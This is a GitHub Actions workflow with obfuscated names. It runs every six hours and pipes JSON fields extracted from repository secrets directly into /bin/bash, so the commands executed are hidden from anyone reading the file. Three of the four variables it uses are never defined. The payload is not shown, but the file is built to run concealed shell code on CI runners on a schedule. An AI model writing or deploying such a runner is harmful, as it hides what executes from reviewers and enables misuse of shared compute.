name: fengyuanchai4545
on:
  workflow_dispatch:
  schedule:
    - cron: '7 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fengyuanchai4545
        env:
          ldut9: ${{ secrets.ldut9 }}
        run: |
          echo $ldut9 | jq -r .q018 | /bin/bash
          echo $dwedc50022 | jq -r .g63 | /bin/bash
          echo $v698 | jq -r .xblj0340 | /bin/bash
          echo $tm79115 | jq -r .u6234 | /bin/bash

